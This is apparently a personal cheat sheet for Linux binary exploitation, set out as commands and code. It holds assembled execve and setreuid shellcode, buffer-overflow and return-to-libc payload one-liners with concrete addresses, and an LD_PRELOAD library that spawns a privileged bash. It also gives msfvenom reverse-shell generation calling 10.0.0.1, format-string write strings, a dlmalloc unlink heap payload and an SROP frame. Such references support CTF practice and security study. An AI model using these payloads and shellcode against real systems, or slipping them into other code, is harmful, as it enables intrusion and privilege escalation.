Last changed: 31.07.2020

linux exploitation

show imports

ldd my_binary
nm -D my_binary
readelf -d my_binary

locate buffer overflow

ltrace -i ./my_binary `python -c 'from pwn import *; g=cyclic_gen(string.ascii_lowercase); print(g.get(100))'`

setup gdb extensions

clone peda and gef

git clone https://github.com/longld/peda.git ~/src/peda
git clone https://github.com/hugsy/gef.git -b master ~/src/gef

.gdbinit

define init-peda
source ~/src/peda/peda.py
end
define init-gef
source ~/src/gef/gef.py
end

/usr/bin/gdb-peda

#!/bin/sh
exec gdb -q -ex init-peda "$@"

/usr/bin/gdb-gef

#!/bin/sh
exec gdb -q -ex init-gef "$@"

pwntools

>>> from pwn import *
>>> p = process(['./binary'])
>>> p = remote('10.0.0.1', 1234)
>>> p.send(p32(0xdeadbeef))
>>> leak = u32(p.recv(4))
>>> p.interactive()

remote gdb debugging

>>> p = process(['gdbserver', 'localhost:1234', './binary'])

stripped binaries

To find the entry point of a stripped PIE binary you can stop at the first instruction with starti or read the entry point from the file info.

(gdb) starti
(gdb) info files
(gdb) info functions

Another method is to look at imported functions and use ltrace

objdump -R my_binary
ltrace my_binary 2>&1 | grep main

source files

If you have the corresponding source code and compiled the binary with debug information, gdb can inspect the source code.

(gdb) list
(gdb) br <filename>:<linenumber>
(gdb) info source
(gdb) info functions <search_regex>
(gdb) info line *<address>

advanced gdb features

environment variables

show env
set env test = ABC
unset env test

modify values

set $eax=1
set {int}$esp=1337
set {char [4]}0xbffffb08="ABC"

signals

info signals
handle SIGSEGV pass nostop

libraries

You can set gdb to break on library load

show stop-on-solib-events
set stop-on-solib-events 1

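disable ASLR, PIE, NX, Canaries, RELRO and compiler optimization

To practice or analyze simple exploits it can help to deactivate some mitigations. On Linux this can be done with the following commands. The first one disables ASLR system-wide and needs root; the gcc flags only affect the compiled binary.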

echo 0 > /proc/sys/kernel/randomize_va_space
gcc -o test test.c -no-pie -zexecstack -fno-stack-protector -znorelro -O0

overload imported functions

#include <stdlib.h>
void usleep() {
  unsetenv("LD_PRELOAD");
  system("/bin/bash -p");
  exit(0);
}

Compile the file as a shared object and load it with LD_PRELOAD.

gcc -fpic -shared -o lib.so lib.c
LD_PRELOAD=/path/to/lib.so my_binary

determine buffer length

metasploit

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x396a4138

peda

gdb-peda$ pattern_create 300
gdb-peda$ pattern_offset 0x41416d41
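
If neither tool is at hand, the idea can be sketched in plain Python. This is a minimal sketch, assuming the Metasploit-style pattern (upper-case letter, lower-case letter, digit) and a 32-bit little-endian register value. The helper names pattern_create and pattern_offset are illustrative and are not the Metasploit or peda implementations.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

# 26 * 26 * 10 three-character groups: the pattern is unique up to this length.
MAX_LENGTH = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` characters of the pattern Aa0Aa1Aa2..."""
    if length > MAX_LENGTH:
        raise ValueError("pattern is only unique up to %d bytes" % MAX_LENGTH)
    groups = product(ascii_uppercase, ascii_lowercase, digits)
    return "".join("".join(g) for g in groups)[:length]


def pattern_offset(value, length=MAX_LENGTH):
    """Offset of a 32-bit little-endian register value, or -1 if not found."""
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(12))
    print(pattern_offset(0x396A4138))
```

The returned offset is the number of padding bytes needed before the bytes that end up in the register.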

send binary data to program input

To send your exploit to a vulnerable binary you can use a scripting language like python or perl. To keep the pipe open after your payload you can use cat.

(perl -e 'print("A"x1234, "\xef\xbe\xad\xde", <SHELLCODE>, "\n")'; cat) | ./vuln_app
(python2 -c 'print("A"*1234 + "\xef\xbe\xad\xde" + <SHELLCODE>)'; cat) | ./vuln_app
(python3 -c 'import sys;sys.stdout.buffer.write(b"A"*1234 + b"\xef\xbe\xad\xde" + <SHELLCODE> + b"\n")'; cat) | ./vuln_app
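
For longer payloads a small script is easier to maintain than a one-liner. The following is a minimal sketch, assuming a 32-bit little-endian target; build_payload is a hypothetical helper, and the offset 1234 and the address 0xdeadbeef are the placeholder values used in the one-liners.

```python
import struct
import sys


def build_payload(offset, ret_addr, shellcode=b""):
    """Padding up to the return address, the new address, then the shellcode."""
    return b"A" * offset + struct.pack("<I", ret_addr) + shellcode + b"\n"


if __name__ == "__main__":
    # Write raw bytes; print() would encode the data and corrupt bytes >= 0x80.
    sys.stdout.buffer.write(build_payload(1234, 0xDEADBEEF))
```

Saved as payload.py (an assumed file name), it can be used like the one-liners: (python3 payload.py; cat) | ./vuln_app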

shellcode generation

Good resources for already assembled shellcode are shell-storm.org and exploit-db.com. You can search the local exploit-db.

searchsploit "Linux/ARM"
grep "Linux/ARM" /usr/share/exploitdb/files_shellcodes.csv

Information on opcodes and Linux syscalls can be found on sparksandflames.com, github.com/corkami and syscalls.kernelgrok.com.

shell.s

BITS 32
xor    eax,eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
push   eax
push   ebx
mov    ecx,esp
mov    al,0xb
int    0x80

Assemble the file and print the opcode string

nasm shell.s -o shell
xxd -p shell

setreuid_shell.s

Some programs (e.g. bash) drop their privileges to the real uid before executing. In this case you can use shellcode that first sets the RUID to the EUID with geteuid (0x31) and setreuid (0x46).

BITS 32
push 0x31
pop eax
cdq
int 0x80
mov ebx, eax
mov ecx, eax
push 0x46
pop eax
int 0x80
mov al, 0xb
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
mov ecx, edx
int 0x80

This results in a 34 byte shellcode.

echo 6a315899cd8089c389c16a4658cd80b00b52686e2f7368682f2f626989e389d1cd80 | sed 's/.\{2\}/\\x&/g'
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80

radare2

With radare2 you can do this in one step

rasm2 -a x86 -b 32 "xor eax,eax; xor edx,edx; push eax; push 0x68732f2f; push 0x6e69622f; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb; int 0x80"

To use the hexstring in a script you can insert escape sequences.

echo 31c031d250682f2f7368682f62696e89e3505389e1b00bcd80 | sed 's/.\{2\}/\\x&/g'
\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
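
The same conversion can be done in Python, which also makes it easy to check the bytes before use. This is a minimal sketch; to_escapes and bad_byte_offsets are hypothetical helper names, and the default bad bytes 0x00 and 0x0a are an assumption that fits many string-based input functions but not every target.

```python
def to_escapes(hexstring):
    """Turn a hex string such as '31c0' into the text \\x31\\xc0."""
    return "".join("\\x%02x" % b for b in bytes.fromhex(hexstring))


def bad_byte_offsets(hexstring, bad=b"\x00\x0a"):
    """Return the offsets of all bytes that the target input would not accept."""
    return [i for i, b in enumerate(bytes.fromhex(hexstring)) if b in bad]


if __name__ == "__main__":
    sc = "31c031d250682f2f7368682f62696e89e3505389e1b00bcd80"
    print(to_escapes(sc))
    print(len(bytes.fromhex(sc)), "bytes, bad bytes at", bad_byte_offsets(sc))
```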

metasploit

Alternatively you can generate shellcode with metasploit

msfvenom -l payloads
msfvenom -p linux/x86/shell_reverse_tcp --list-options
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 -b "\x00\x0a" -f c

To test the generated shellcode you can use the following program

shellcode_test.c

#include <stdlib.h>

char sc[] = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void){
    /* treat the byte array as a function and jump to it */
    void (*f)(void);
    f = (void (*)(void))sc;
    f();
    return 0;
}

Compile the program as a 32-bit binary with an executable stack

gcc -m32 -z execstack -o shellcode_test shellcode_test.c

cat shellcode

Sometimes an interactive shell is not the best choice for your payload. If you just want to read a specific file on the target you could generate a shellcode which executes cat <FILE>. I wrote a small script that generates such shellcode.

modify precompiled shellcode

To disassemble and patch shellcode you can use the Online Assembler and Disassembler on shell-storm.org or do it with radare2

rasm2 -b 64 -d `echo "\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x80\xb8\x00\x00\x00\x48\x89\xc1\x48\x8b\x80\xe8\x02\x00\x00\x48\x2d\xe8\x02\x00\x00\x4c\x8b\x88\xe0\x02\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x58\x03\x00\x00\x48\x89\x91\x58\x03\x00\x00\xc3" | tr -d '\\\\x'` | tr '\n' ';'
rasm2 -b 64 "mov rax, qword gs:[0x188];mov rax, qword [rax + 0xb8];mov rcx, rax;mov rax, qword [rax + 0x2f0];sub rax, 0x2f0;mov r9, qword [rax + 0x2e8];cmp r9, 4;jne 0x13;mov rdx, qword [rax + 0x360];mov qword [rcx + 0x360], rdx;ret;" | sed 's/.\{2\}/\\x&/g'

trampolines

If randomization is in use you could try to find an instruction like jmp rsp in a library or binary that is mapped at a fixed address. Then overwrite the return address with the address of such a trampoline, followed by your shellcode.

find base addresses

cat /proc/<pid>/maps | grep libc
(gdb) info proc mappings
gdb-peda$ vmmap
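
The maps file can also be parsed from a script. This is a minimal sketch, assuming the usual six-column layout of /proc/<pid>/maps; library_base is a hypothetical helper and the sample lines in the demo are made up for illustration.

```python
def library_base(maps_text, name="libc"):
    """Return the lowest start address of all mappings whose path contains name."""
    bases = []
    for line in maps_text.splitlines():
        fields = line.split()
        # address range, perms, offset, device, inode, path
        if len(fields) >= 6 and name in fields[5]:
            bases.append(int(fields[0].split("-")[0], 16))
    return min(bases) if bases else None


if __name__ == "__main__":
    sample = (
        "08048000-08049000 r-xp 00000000 08:01 131 /home/user/vuln_app\n"
        "b7e2c000-b7fd7000 r-xp 00000000 08:01 527 /lib/i386-linux-gnu/libc-2.19.so\n"
        "b7fd7000-b7fd9000 r--p 001aa000 08:01 527 /lib/i386-linux-gnu/libc-2.19.so\n"
    )
    print(hex(library_base(sample)))
```

For a live process, pass the content of /proc/<pid>/maps instead of the sample text.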

search instructions

objdump -D /usr/lib/libc.so.6 -M intel | grep -e'jmp *rsp'
ropper -f /usr/lib/libc.so.6 -I 0xBA5E0000 --instructions 'jmp rax'
gdb-peda$ jmpcall esp libc

nasm shell

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 64
nasm > jmp rsp
00000000  FFE4              jmp rsp

rasm2

rasm2 -a arm -b 16 'bx sp'
6847
rasm2 -a arm -b 16 -d 6847
bx sp

search opcode with ropper

ropper -f arm_libc.so.6 -I 0xBA5E0000 --opcode 6?47
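
Once the opcode bytes are known (FF E4 for jmp rsp, as shown by the nasm shell), a raw byte search is enough to list candidates. This is a minimal sketch; find_opcode is a hypothetical helper, and adding the base to a plain file offset is a simplifying assumption that only holds when file offsets and memory offsets of the segment match. Hits outside executable mappings are useless.

```python
def find_opcode(blob, opcode, base=0):
    """Return base + offset for every occurrence of opcode in blob."""
    hits = []
    pos = blob.find(opcode)
    while pos != -1:
        hits.append(base + pos)
        pos = blob.find(opcode, pos + 1)
    return hits


if __name__ == "__main__":
    # Made-up bytes standing in for the content of a library file.
    blob = b"\x90\xff\xe4\x90\x90\xff\xe4"
    print([hex(addr) for addr in find_opcode(blob, b"\xff\xe4", 0xBA5E0000)])
```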

return2libc (32bit)

If the base address of the libc is fixed and if you find everything you need in its address space you can write a return2libc exploit.

find function addresses

gdb-peda$ x/wx system
0xb7e67310 <system>:    0x08ec8353
gdb-peda$ x/wx exit
0xb7e5a260 <exit>:      0x5a55e853

search strings with gdb

Then you look up the string /bin/sh, which is included in the libc.

(gdb) br __libc_start_main
(gdb) run
(gdb) info sharedlibrary
(gdb) find &system,+9999999,"/bin/sh"

search strings with peda

gdb-peda$ searchmem "/bin/sh" libc

search string with gef

gef> search-pattern "/bin/sh"

exploit

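Finally you overwrite the return address with <SYSTEM ADDR><EXIT ADDR></BIN/SH ADDR>. The exit address serves as the return address of system, so the program terminates cleanly afterwards.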

./binary `python2 -c 'print("A"*32 + "\x10\x73\xe6\xb7" + "\x60\xa2\xe5\xb7" + "\x4c\x9d\xf8\xb7")'`
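
The same payload can be assembled with struct so that the addresses stay readable. This is a minimal sketch, assuming a 32-bit little-endian target; the addresses are the example values from this section, the /bin/sh address is decoded from the one-liner, and ret2libc_payload is a hypothetical helper.

```python
import struct

SYSTEM = 0xB7E67310  # address of system
EXIT = 0xB7E5A260    # address of exit, used as return address of system
BINSH = 0xB7F89D4C   # address of the string "/bin/sh" in the libc


def ret2libc_payload(offset, func, ret, arg):
    """Padding, function address, its return address, its first argument."""
    return b"A" * offset + struct.pack("<III", func, ret, arg)


if __name__ == "__main__":
    print(ret2libc_payload(32, SYSTEM, EXIT, BINSH))
```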

return to dl-resolve

In binaries without Full Relocation Read-Only it can be possible to create the needed parameters and call _dl_runtime_resolve on any chosen function in the loaded libraries.

get needed addresses

objdump -x my_binary | grep -e STRTAB -e SYMTAB -e JMPREL
gef> maintenance info sections
gef> got

buffer layout

             --------------
<buffer>    | fake EBP      |   for leave instruction
            | PLT[0]        |   push link_map; jmp _dl_runtime_resolve
            | rel_offset    |   <buffer + X> - JMPREL
            | fake RET      |   after function call
            | function args |
            | ...           |
<buffer +X> | r_offset      |   some GOT address for resolved address
            | r_info        |   (<buffer + Y> - SYMTAB) << 4 | 0x7
            | ...           |   padding till (st_name - SYMTAB) % 0x10 ==0
<buffer +Y> | st_name       |   <buffer + Z> - STRTAB
            | st_value      |   0x0 (irrelevant)
            | st_size       |   0x0 (irrelevant)
            | st_info       |   0x0 (visibility check: st_other & 0x3 == 0)
<buffer +Z> | sym_string    |   function name (e.g. "execve\0")
            | ...           |
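
The values in the layout can be computed with a few lines of Python. This is a minimal sketch for 32-bit x86, assuming 16-byte Elf32_Sym entries and relocation type 7 (R_386_JMP_SLOT); the helper names and all addresses in the demo are made up for illustration.

```python
R_386_JMP_SLOT = 7
SYM_SIZE = 16  # sizeof(Elf32_Sym)


def align_symbol(addr, symtab):
    """Next address >= addr with (addr - SYMTAB) % 0x10 == 0."""
    return addr + (-(addr - symtab)) % SYM_SIZE


def rel_offset(rel_addr, jmprel):
    """Value pushed before PLT[0]: distance of the fake Elf32_Rel from JMPREL."""
    return rel_addr - jmprel


def r_info(sym_addr, symtab):
    """Symbol index in the upper bits, relocation type in the lowest byte."""
    diff = sym_addr - symtab
    if diff % SYM_SIZE:
        raise ValueError("fake symbol is not aligned to the symbol table")
    return ((diff // SYM_SIZE) << 8) | R_386_JMP_SLOT


def st_name(str_addr, strtab):
    """Distance of the function name string from STRTAB."""
    return str_addr - strtab


if __name__ == "__main__":
    symtab = 0x080481D8                      # made-up SYMTAB address
    sym = align_symbol(0x0804A05C, symtab)   # made-up position in the buffer
    print(hex(sym), hex(r_info(sym, symtab)))
```

For an aligned symbol the result equals (<buffer + Y> - SYMTAB) << 4 | 0x7 from the layout, because dividing by 16 and shifting left by 8 is the same as shifting left by 4.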

execution

To get your function resolved you could try to move the stack pointer into your buffer with a leave; ret gadget.

There should be enough writable space above the buffer for the following stack frames of _dl_runtime_resolve.

A detailed writeup of this method can be found on github.

OneGadget

With the tool one_gadget you can search for a single gadget which will execute "/bin/sh".

one_gadget --base <BASE_ADDRESS> libc.so.6

return oriented programming

search gadgets

ropper -f my_library --nocolor > rop_gadgets.txt

ropper can search for gadgets in binaries. ? stands for any character and % for any string.

ropper -f my_library -I <base> --search 'pop e?x; pop e?x'
ropper -f my_library -I <base> --search 'mov [???], eax'
ropper -f my_library -I <base> --search 'mov [e%], eax'

generate full chain

ropper -f my_library --chain "execve cmd=/bin/sh" --badbytes 000a

find statically mapped libraries

ltrace ./my_binary 2>&1 | grep -e mmap -e open

format string exploits

In most calling conventions some or all parameters are passed on the stack. On 64-bit Linux the first six arguments are passed in RDI, RSI, RDX, RCX, R8 and R9; additional arguments are passed on the stack. On 64-bit Windows the registers are RCX, RDX, R8 and R9, with the rest on the stack.

Depending on the format string vulnerability the content of these registers and the stack can be read or used to modify memory.

read data

First you have to find out at which parameter position your string is placed.

AAAA%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x

Then you send the address you want to read and the found parameter position.

\xef\xbe\xad\xde%7$s

write data

To write data you can use the %n placeholder to write 4 bytes, %hn for 2 bytes and %hhn to write a single byte. The value written to the referenced address is the number of bytes printed so far. This number can be raised with the width field of a preceding placeholder.

To write the value 0x1337 to the address 0xdeadbeef use

\xef\xbe\xad\xde%4915x%7$n
\xef\xbe\xad\xde%4915x%7$hn
\xef\xbe\xad\xde\xf0\xbe\xad\xde%11x%8$hhn%36x%7$hhn
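
The widths in the last line follow from simple arithmetic: 8 address bytes are already printed, 11 more give 0x13 and another 36 give 0x37. This calculation can be sketched in Python. It is a minimal sketch, assuming 32-bit addresses placed at the start of the string and %hhn writes; fmt_write_bytes is a hypothetical helper and not the pwntools implementation.

```python
import struct


def fmt_write_bytes(addr, value, nbytes, first_param):
    """Build a %hhn payload that writes the low nbytes of value to addr."""
    payload = b"".join(struct.pack("<I", addr + i) for i in range(nbytes))
    written = len(payload)
    # (byte value, parameter position) pairs, smallest byte value first
    targets = sorted(((value >> (8 * i)) & 0xFF, first_param + i)
                     for i in range(nbytes))
    for byte, param in targets:
        pad = (byte - written) % 256
        if 0 < pad < 8:
            # %x may print up to 8 digits, so small widths are not reliable;
            # one extra wrap around keeps the low byte of the counter the same.
            pad += 256
        if pad:
            payload += b"%%%dx" % pad
            written += pad
        payload += b"%%%d$hhn" % param
    return payload


if __name__ == "__main__":
    print(fmt_write_bytes(0xDEADBEEF, 0x1337, 2, 7))
```

Sorting by byte value keeps the padding small, since the counter of printed bytes can only grow.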

finding write locations

If you do not know the location of the return address you could try writing to the .fini_array, the .dtors or the .got.plt. If none of these work, check whether you can overwrite the address of .fini in the .dynamic section.

readelf -S binary | grep -e got -e dtors -e fini -e dynamic
(gdb) maintenance info sections
gef> got

If you can only write a single byte you could try to overwrite the got entry of a function which is not yet resolved with the plt entry address of another function (e.g. system).

pwntools

def send_fmt(s):
    p.sendline(s)
    d = p.recvuntil(prompt)
    return d[:-len(prompt)]
fmt = FmtStr(execute_fmt=send_fmt, offset = str_offset)
fmt.write(target, value)
fmt.execute_writes()

libformatstr

The python module libformatstr can also help writing format string exploits.

heap overflows

heap chunks

              used chunk          free chunk
             --------------      --------------
            | prev_size    |    | prev_size    |
            | size + flags |    | size + flags |
pointer ->  | data         |    | FD pointer   |
            | ...          |    | BK pointer   |
             --------------      --------------

The flags are 3 bits. The LSB is the PREV_INUSE flag.

As prev_size is only needed if the previous chunk is free it can be used for data by a previous chunk which is in use.
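
The size field can be decoded with a few bit masks. This is a minimal sketch of the glibc layout, where the three lowest bits are PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA; decode_size_field is a hypothetical helper name.

```python
PREV_INUSE = 0x1
IS_MMAPPED = 0x2
NON_MAIN_ARENA = 0x4


def decode_size_field(field):
    """Split the size field of a chunk into the chunk size and its flags."""
    return {
        "size": field & ~0x7,
        "prev_inuse": bool(field & PREV_INUSE),
        "is_mmapped": bool(field & IS_MMAPPED),
        "non_main_arena": bool(field & NON_MAIN_ARENA),
    }


if __name__ == "__main__":
    print(decode_size_field(0x91))
```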

You can analyse the heap with gef

gef> heap bins
gef> heap chunks

memory allocator hooks

The libc offers writable memory to put in hooking functions for debugging the memory allocation process.

(gdb) info address __malloc_hook
(gdb) info address __realloc_hook
(gdb) info address __free_hook
(gdb) info address __memalign_hook

These functions get called if the corresponding memory allocation is done. Therefore they represent perfect targets to gain code execution.

Even if malloc is not directly called by the vulnerable binary you can sometimes trigger it (e.g. by calling printf(<64k string>)).

dlmalloc (without safe unlinking)

Prerequisites are a chunk with a buffer overflow vulnerability into another chunk which will be freed afterwards by the program.

By overwriting the chunk's metadata we can insert fake chunks to enforce coalescence and unlinking.

#define unlink(P, BK, FD) {                     \
    FD = P->fd;   /* read from chunk +8  */     \
    BK = P->bk;   /* read from chunk +12 */     \
    FD->bk = BK;  /* writes BK to FD +12 */     \
    BK->fd = FD;  /* writes FD to BK +8  */     \
}

Negative values are used for the sizes to avoid zero bytes. Therefore the "next" chunk is located in memory before the "previous" chunk.

  fake_after_next         fake_next               freed chunk
 --------------------    --------------------    --------------------
| "AAAA"             |  | "AAAA"             |  | "AAAA"             |
| PREV_INUSE not set |  | "\xf9\xff\xff\xff" |  | "\xf1\xff\xff\xff" |
 --------------------   | <target_addr -12>  |   --------------------
                        | <shellcode_addr>   |
                         --------------------

To determine the need for coalescence, free() checks the PREV_INUSE flag of the freed chunk itself and the one of the chunk after the next. As the latter is not set, the next chunk is considered free and has to be unlinked.

The shellcode should begin with a short jump over some unused bytes as the target_addr will be written into this space by unlink().
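
The two writes of unlink() can be replayed on a simple memory model. This is a minimal sketch, assuming 32-bit chunks with fd at offset 8 and bk at offset 12; the dictionary stands in for process memory and all addresses are made up for illustration.

```python
def unlink(mem, chunk):
    """Replay the two pointer writes of the unlink macro without safe unlinking."""
    fd = mem[chunk + 8]
    bk = mem[chunk + 12]
    mem[fd + 12] = bk  # FD->bk = BK
    mem[bk + 8] = fd   # BK->fd = FD


if __name__ == "__main__":
    target = 0x080496CC      # made-up address that should be overwritten
    shellcode = 0x0804A008   # made-up address of the shellcode
    fake_next = 0x0804A0A0   # made-up address of the fake chunk
    mem = {fake_next + 8: target - 12, fake_next + 12: shellcode}
    unlink(mem, fake_next)
    print(hex(mem[target]))         # the target now holds the shellcode address
    print(hex(mem[shellcode + 8]))  # side effect inside the shellcode
```

The second write is the reason for the short jump: it lands 8 bytes after the start of the shellcode.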

In this example the distance between the two chunks is 0xa0 and the value at 0x080496cc gets overwritten with the shellcode address 0x0804a008.

python2 -c 'sc="\xeb\x0e"+"A"*14+"\xcc"; print(sc+"A"*(0xa0-8-len(sc)-5*4)+"\x02"+"A"*7+"\xf9\xff\xff\xff"+"\xb8\x96\x04\x08"+"\x08\xa0\x04\x08"+"A"*4+"\xf1\xff\xff\xff")'

leaking heap bin addresses

If a chunk from a heap bin is not overwritten it can be possible to obtain the values of its FD or BK pointers. This can be interesting if they point to the list head, e.g. in the main arena of libc.

tcache poisoning

The Tcache is another fast heap bin which can hold up to 7 singly linked free chunks for each size.

By overwriting the FD pointer of a chunk in the Tcache you could trick malloc into returning an arbitrary memory location: the first request of that size returns the corrupted chunk, the next one returns the address stored in its FD pointer.
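
The effect can be shown with a toy model of a single Tcache bin. This is a minimal sketch, assuming plain FD pointers without any pointer protection or integrity checks, as in the first glibc versions with Tcache; the class TcacheBin and all addresses are made up for illustration.

```python
class TcacheBin:
    """Toy model of one Tcache bin: a singly linked LIFO list of free chunks."""

    MAX_CHUNKS = 7

    def __init__(self):
        self.mem = {}   # chunk address -> FD pointer stored in the free chunk
        self.head = 0
        self.count = 0

    def free(self, chunk):
        if self.count >= self.MAX_CHUNKS:
            raise RuntimeError("bin is full, the chunk would go to another bin")
        self.mem[chunk] = self.head
        self.head = chunk
        self.count += 1

    def malloc(self):
        chunk = self.head
        self.head = self.mem.get(chunk, 0)
        self.count -= 1
        return chunk


if __name__ == "__main__":
    tcache = TcacheBin()
    tcache.free(0x1000)
    tcache.free(0x1020)
    tcache.mem[0x1020] = 0x601040   # overflow or use after free overwrites FD
    print(hex(tcache.malloc()))     # the corrupted chunk
    print(hex(tcache.malloc()))     # the forged address
```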

Sigreturn Oriented Programming

An interesting alternative method for execution flow control is Sigreturn Oriented Programming (SROP).

By calling the sigreturn syscall (0xf) the kernel will try to read a signal frame from the current stack position and will update the cpu context accordingly.

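from pwn import *
context.clear(arch="amd64")
frame = SigreturnFrame(kernel="amd64")
frame.rax = 59                          # execve
frame.rdi = ptr_command                 # address of the command string (placeholder)
frame.rsi = 0
frame.rdx = 0
frame.rip = ptr_syscall                 # address of a syscall gadget (placeholder)
payload = bytes(frame)                  # place this on the stack after the sigreturn call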

Multiple frames can be chained with a syscall; ret gadget.

debugging other architectures

run in qemu

qemu-mips -noaslr -g 1234 ./mips_binary

connect with gdb-multiarch

gdb-multiarch
set endian big
set architecture mips
target remote localhost:1234